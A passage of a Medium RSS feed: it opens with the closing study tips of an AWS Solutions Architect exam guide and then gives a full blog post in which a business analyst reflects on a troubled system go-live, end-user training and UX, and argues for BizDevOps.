src="https://cdn-images-1.medium.com/max/1024/1*KOthO862j3c2cn6rwuAMnA.jpeg" /></figure><p>I’m sure that you still don’t feel ready after completing the above stages. Let’s save 1 week to familiarise the exam and discover your blind spots through mock exams. There are many choices on Udemy. I find that they all provide detailed explanation to each question after you finish the test. This is really helpful. Taking many tests is unnecessary (4~5 is enough).</p><h3>General study techniques</h3><ol><li>Learn from mistakes. Note down all uncertain questions and incorrect questions in practice. Review them from time to time.</li><li>Learn to compare. It occupies less storage in our brain as we only need to memorise differences. Common comparison include EBS vs instance store, Classic LB vs ALB vs NLB, on demand vs spot vs reserved instances, etc.</li><li>Learn by associating. I always think of parcel locker when I learn decoupling architecture.</li><li>Learn through helping. When you explain certain concepts to others, you’re reinforcing your memory.</li><li>Learn in sleep. Knowledge is refined and consolidated during the sleep. So sleep well.</li></ol><p>In the end, I have to admit that this exam is difficult for me. I feel that I still have a lot to learn. So this is not an end but a beginning.</p><p>Good luck to everyone who’s learning AWS SA. Let me know if there’s anything wrong in this guide. Also feel free to contact me if you need some prep talk haha.</p><p>Thank you for reading and sharing.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=bc6119262846" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[More than DevOps — another perspective on The Phoenix Project]]></title>
            <link>https://geek-lady.medium.com/more-than-devops-another-perspective-on-the-phoenix-project-c6634ab9cc5a?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/c6634ab9cc5a</guid>
            <category><![CDATA[bizdevops]]></category>
            <category><![CDATA[the-phoenix-project]]></category>
            <category><![CDATA[it]]></category>
            <category><![CDATA[devops]]></category>
            <category><![CDATA[business-analyst]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Fri, 08 May 2020 02:51:44 GMT</pubDate>
            <atom:updated>2020-05-08T02:51:44.719Z</atom:updated>
            <content:encoded><![CDATA[<h3>More than DevOps — another perspective on The Phoenix Project</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/406/0*mpyqiEIHIjlrHiln" /></figure><p>As the book subtitle shows, this book is about IT, DevOps and Business. It integrates DevOps principles into the story and vividly illustrates how organisations change. Everyone who works in IT projects should feel familiar with stories in the book.</p><h3>My story</h3><p>I can relate to the book but I want to tell my story from a different angle, business perspective. I was a business analyst in a project which is very critical to the company, probably just like Phoenix Project. The project is to bring competitive advantages for the company if successful. It involves replacing an old system which provides a new shopping experience for customers. When we were still in the development phase of the project, another project went to the deployment stage and created a lot of chaos afterwards. I could recall IT ops were busy putting out fires.</p><p>When the day our project went live came, everyone in the team was very excited. It was the first project of new IT architecture put into production. I became excited as that was my first time experiencing deployment. The business manager only gave us a few hours’ time window to deploy the new system. So we used the day to check servers, migrate static data, etc. At midnight, the old system was shut down and new system was launched. We had developed a dashboard to capture exceptions. In the first two hours after new system’s activation, I closely monitored the dashboard and would report if there’s any. It seemed so successful as there’s no critical incident occurred. So I completed documentation of this go-live and went home to sleep.</p><p>The next morning when I entered the office, my colleague told me to check OA. We’ve built a group specifically for end users of this project. My heart sank when I saw ‘99+’ . It’s different when you see others work and you work. I wish I could be splitted to 2 to share the burden. I tried my best to multi-task, one hand holding the phone hearing their complaint with eyes looking at the screen and the other hand typing answers. Days like this lasted for a while.</p><p>We did analysis about causes of incidents and found that about half is system deficiency, and the rest is human mistake. Their mistakes can be misunderstanding and wrong operation. The result is very surprising. It just reminds me that it is often said in cybersecurity circle that <strong>human is the weakest link</strong>.</p><h3>Missing puzzle</h3><p>If we dive deeper, why do users still make mistakes after receiving trainings? Reasons vary.</p><ol><li>Not enough and effective engagement</li></ol><p>When we did business analysis, we engaged a lot with product manager, marketing manager, etc. but little with end users. They were invited to workshops but they barely expressed their opinions. It wasn’t until UAT (User Acceptance Testing) that they became lead actors. Part of end users received face-to-face trainings 2 weeks before the go-live. For the rest who were in another city, we provided online training, wrote user manuals and recorded videos to help them learn. In the end, remote users made more mistakes than locals. We also didn’t establish a measurement system to examine the effectiveness of training. End users claimed that they understood but there’s a gap between understand and act.</p><p>2. No consideration of user experience</p><p>The requirements were mainly from one representative of end users, who’s the manager. Our focus is on functions. It’s very common that a backend system (end users are employees) ignores UX. Here’re some examples of backend system interfaces.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*kMU_Vq4h15Wm_S6L" /><figcaption>SAP CRM</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/754/0*hFMqowne5ON-BBxz" /><figcaption>Oracle EBS</figcaption></figure><p>Our system interface looks prettier than these two giants (I can’t share screenshots as it’s confidential). But we had no consideration about UX. Also, end users only gave us feedback regarding functions rather than their experience. It appears that an end user has to endure terrible design of experience. They didn’t like the system so learning about is a task, not a pleasure. It’s very pathetic that no one cares about end users in the company.</p><h3>Perhaps BizDevOps?</h3><p>I also asked developers in my team about whether have they considered end users. The answer is no.</p><p>I can understand why company gives zero thought of end users. It’s an internal system. A user friendly system is not adding value. The book stressed the importance of creating business values through IT. My project does achieve business goals. But can it be called a success?</p><p>I doubt it. Reluctance to new system, low satisfaction…</p><p>My hunch is to introduce BizDevOps to the company. It should be more like a culture, a methodology rather than tools, practices. I believe that many companies are already doing this and find that this term has been created. However, they need to ask these questions:</p><blockquote>Does business truly understand IT?</blockquote><blockquote>Does IT truly understand business?</blockquote><blockquote>How effective is BA? (BA is the conduit of Business and IT.)</blockquote><p>We need to shape IT’s mind about user-centered design. It’s discussed a lot in software development but often ignored in internal projects. BA needs to rethink the business definition, scope and goal. BA needs to balance end users and their managers’ needs. Business leaders should care more about end users, letting them voice their opinions.</p><p>BizDevOps needs collaboration of multiple parties and can only be successful on mutual understandings. I think based on this principle, you can find suitable ways to implement in your company.</p><h3>Closure</h3><p>A couple of years have passed since that project completed but it left me with a strong impression. I’m certain that a lot has changed in IT projects. The adoption of agile methodology makes it easier to cater to business needs. If you have any thought, don’t hesitate to comment.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=c6634ab9cc5a" width="1" height="1" alt="">]]></content:encoded>
        </item>
    </channel>
</rss>